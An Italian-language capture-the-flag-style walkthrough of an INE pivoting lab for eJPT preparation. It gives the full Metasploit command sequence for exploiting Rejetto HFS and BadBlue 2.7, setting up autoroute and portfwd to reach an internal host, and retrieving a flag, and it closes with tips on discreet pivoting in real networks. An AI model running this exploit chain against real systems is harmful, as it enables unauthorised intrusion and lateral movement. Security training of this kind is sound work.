Pivoting Lab Guide (INE eJPT Preparation)
Questa guida approfondita descrive passo-passo l'approccio usato in un laboratorio di pivoting proposto da INE, utile per la preparazione alla certificazione eJPT. ---
Pivoting Lab Guide (INE eJPT Preparation)
Questa guida approfondita descrive passo-passo l'approccio usato in un laboratorio di pivoting proposto da INE, utile per la preparazione alla certificazione eJPT.
Step 1: Verifica connettività verso la macchina target
Apri la macchina Kali tramite il link del laboratorio. Verifica la raggiungibilità della macchina target:
ping -c 4 demo1.ine.localStep 2: Scansione iniziale con Nmap
Identifica i servizi in esecuzione sulla prima macchina target:
nmap demo1.ine.localPoi focalizzati sulla porta 80 per recuperare informazioni di versione:
nmap -sV -p80 demo1.ine.localStep 3: Ricerca dell'exploit
Usa searchsploit per cercare exploit compatibili con il servizio individuato (Rejetto HFS):
searchsploit hfsIdentifica il modulo exploit/windows/http/rejetto_hfs_exec utilizzabile con Metasploit.
Step 4: Esecuzione dell'exploit su HFS
Apri msfconsole e configura il modulo:
msfconsole
use exploit/windows/http/rejetto_hfs_exec
set RHOSTS demo1.ine.local
exploitDovresti ricevere una sessione Meterpreter attiva.
Verifica l'indirizzo IP della macchina compromessa:
ipconfigStep 5: Pivoting verso la seconda macchina
Non è possibile accedere direttamente alla seconda macchina dal tuo host. Serve quindi il pivoting.
Aggiungi route:
run autoroute -s 10.0.16.0/20Lancia uno scanner sulla seconda macchina (demo2.ine.local):
background
use auxiliary/scanner/portscan/tcp
set RHOSTS demo2.ine.local
set PORTS 1-100
exploitViene scoperta la porta 80.
Step 6: Port forwarding
Riprendi la sessione Meterpreter:
sessions -i 1Configura il port forwarding:
portfwd add -l 1234 -p 80 -r demo2.ine.local
portfwd listScansiona la porta 1234 in locale (che è forwardata alla porta 80 remota):
nmap -sV -sS -p 1234 localhostStep 7: Exploit della seconda macchina (BadBlue)
Cerca exploit per BadBlue 2.7:
searchsploit badblue 2.7Utilizza il modulo exploit/windows/http/badblue_passthru:
use exploit/windows/http/badblue_passthru
set PAYLOAD windows/meterpreter/bind_tcp
set RHOSTS demo2.ine.local
exploitUna nuova sessione Meterpreter viene stabilita.
Step 8: Ricerca del flag
Entra in shell e naviga nella root:
shell
cd /
dir
type flag.txtFlag: c46d12f28d87ae0b92b05ebd9fb8e817
Considerazioni Finali e Best Practice
- Utilizza sempre
autorouteper aggiornare correttamente le tabelle di routing all'interno di Metasploit.
- Il comando
portfwdè essenziale per eseguire scansioni o collegamenti verso host non direttamente raggiungibili.
- In una rete reale, potresti voler usare proxychains o socks proxy per effettuare pivoting più discreto (con strumenti come
socatoproxychains-ng).
- In fase di escalation, combina le informazioni di routing con tecniche di privilege escalation per estendere il controllo sulla rete.